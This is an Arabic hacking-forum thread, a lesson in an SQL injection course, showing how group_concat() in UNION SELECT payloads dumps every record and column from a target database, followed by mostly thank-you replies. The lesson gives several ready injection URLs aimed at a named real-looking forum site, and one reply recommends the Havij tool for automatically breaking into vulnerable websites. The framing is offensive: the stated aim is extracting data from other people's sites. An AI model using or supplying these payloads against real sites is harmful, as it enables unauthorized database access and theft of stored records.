المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [الدرس الثامن] شرح group_concat() لإستخراج جميل السجلات



ASDELY-ScOrPiOn
01-27-2012, 08:52 PM
SQL INJECTION , دورة SQL injection , دروة الحقن, دورة حقن sql injection , شرح استغلال ثغرات sql injection , شرح دورة الحقن , شرح sql injection , شرح group_concat ، شرح استغلال group_concat

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

درس اليوم يتكلم عن group_concat()

group_concat()
هذا الدرس مقدم من منتديات جيوش الهكرز و ASDELY.NET بواسطة ASDELY-ScOrPiOn

طيب بعطي مثال وان شاء الله تفهموا
لنفرض انه عندنا موقع ومركب عليه قاعدة بيانات اسمها ASDELY.NET وداخلها يوجد جدول اسمه Aljyyosh.com
وداخله عمودان
الاول اسمه Site
والثاني اسمه Name
ويوجد داخله 3 سجلات ، كما في الصورة التاليه
http://aljyyosh.info/aljyyosh/dwrat/sql/1/2.png

ولنفرض انه عندنا ثغرة sql injection على الموقع والعامود الرابع مصاب
لنفرض انه هذا الموقع
http://www.aljyyosh.com/vb/forumdisplay.php?f=76
طيب نطبق الثغره عليه ونستخرج السجلات منه ، يصير الرابط هيك

http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,Name,5,6, 7,8,9,10+from+Aljyyosh.com--
بعد تنفيذ هذا الامر رح تطلع لنا النتيجه فقط ASDELY-ScOrPiOn
بس احنا نريد ان نستخرج جميل السجلات وليس سجل واحد! ، او نحن نريد ان نستخرج جميل السجيلات من العامودين Name و Site
رح يكون الامر كالتالي

http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_con cat(Name),5,6,7,8,9,10+from+Aljyyosh.com--
في هذا الامر رح يستخرج لنا جميع السجلات ، بمعنى انه رح يطلع لنا
ASDELY-ScOrPiOn;Black.jaguar;ASDELY-ScOrPiOn

او ننفذ الامر التالي حتى يستخرج لنا جميع السجلات وكل اسم وجنبه موقعه

http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,group_con cat(Name,0x3e,Site),5,6,7,8,9,10+from+Aljyyosh.com--



بإختصار هذه الدالة كحلقة تكرار ،...، بمعنى اسهل انو هذه الدالة تستخرجلك كل السجلات مع بعض او استخراج جميل السجيلات من اكثر من عامود!


انتهى الشرح :) ، وأي شيء غير مفهوم انا موجود وما بقصر :)

بالتوفيق للجميع... اخوكم ASDELY-ScOrPiOn

مع تحيات منتديات جيوش الهكرز و ASDELY.NET

kaiser hackers
01-28-2012, 03:50 AM
شرف كبير أن أكون أول من يرد على أحد مواضيعك المميزه
مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء

sisiso
01-28-2012, 04:02 AM
مشكور اخي الغالي
وانشالله نستفيد من دروسك المميزة






ارجو الدعاء لأخوانكم بسوريا

ASDELY-ScOrPiOn
01-28-2012, 03:14 PM
شرف كبير أن أكون أول من يرد على أحد مواضيعك المميزه
مشكوووووووووووور على الشرح ننتضرالمزيد من أبداعك رايتك بيضاء

هلا فيك حبيبي وشرفني مرورك
بالتوفيق


مشكور اخي الغالي
وانشالله نستفيد من دروسك المميزة






ارجو الدعاء لأخوانكم بسوريا

هلا فيك حبيبي الغالي ومنور المنتدى
بالتوفيق

kingthem
01-29-2012, 06:43 PM
بارك الله فيك ما قصرت

ASDELY-ScOrPiOn
01-31-2012, 12:16 PM
هلا فيك حبيبي ومنور بمرورك

اي استفسار انا موجود ، بالتوفيق...

moahd bls
02-12-2012, 02:27 PM
]جراك الله خير على الدرس الجميل

emki11
02-12-2012, 06:04 PM
مشكوووووور

عراقي____والقلب_____راقي
02-18-2012, 02:58 AM
والله شرح مفيد بس للافادة اكو برنامج اسمة HAVIJبرنامج مفيد لاختراق المواقع المصابة بثغرة سكل (SQL injection) بس تظع اسم الموقع وهو يبحث عن الثغرة

BLOODZ
05-12-2012, 05:57 PM
بآآرك الله فيك يالمبدع ,, ومترقب كل جديدك بإذنه

house21
06-08-2012, 01:48 PM
مشكور يا غالي
يعطيك العافية

wassim rel
06-11-2012, 11:32 AM
شكرا على الموضع لاكن أخي لم أفهم عندما وضعت http://www.aljyyosh.com/vb/forumdisplay.php?f=76+union+select+1,2,3,Name,5,6, 7,8,9,10+from+Aljyyosh.com--

ماذا تعني 5 6 7 8 9 هل هذه أيضا أعمدة مصابة؟؟؟

dark-man
06-13-2012, 12:43 PM
مشكور يا غالي لك من كل قلبي الله يعطيك العافية ويزيدك علما من علمه كما تعلمنا مما علمك الله

shadow_tdk
07-09-2012, 06:20 PM
يسلم أديك وبارك الله فيك ياأخي

Abdelrhman7
07-25-2012, 03:28 PM
بصراحه اخى انا مش فاهم هذا الدرس

انت قلت فىالدرس السابق انوا راح يكون فيديو

santos7x7x
08-19-2012, 12:27 AM
مشكووووووووووووور بس انت الدرس اللى فات قلت انك راح تحط فديو فى هذا الدرس وين الفديو

أدولف هيتلر
08-28-2012, 04:35 PM
ربي يخليك زيحفظك ويزيدك من فضله ..

مهند سفروت
09-17-2012, 12:57 AM
مشكور اخي الكريم جزاك الله كل خيرر

zaizo max
09-25-2012, 02:12 PM
شكرا اخى الكريم وجزاك الله خيرا

mr.selfster
10-15-2012, 05:29 PM
مشكور على الموضوع الرائع

boss-m
11-02-2012, 09:41 PM
مشكووووووووووور يا غالي شرح وافي

chemsou algeria
11-10-2012, 06:38 PM
بارك الله فيك ما قصرت

:)

!Security4HACKER!
11-30-2012, 11:55 AM
بآآر‘ك‘ الله‘ فيك‘ يامبدع‘ ‘

الفتى المبدع
12-16-2012, 07:35 PM
شكرا لك اخي الكريم .,.,

jakymaikel
08-02-2013, 12:48 AM
شكراااااااااااااااااااااا ااااااااااااااااااا

shadow_tdk
08-03-2013, 05:01 PM
مشكووووووووور على الشرح الرائع

hacker zammani
08-18-2013, 01:31 AM
والله مبدع ماتقصر

قهر اليهود
08-18-2013, 10:03 PM
بارك الله فيك

crvmj
12-17-2015, 02:07 AM
group_concat(Name,0x3e,Site)
ماذا تعني 0x3e

hacker tarek
12-17-2015, 11:07 AM
مشكوووووووووووووور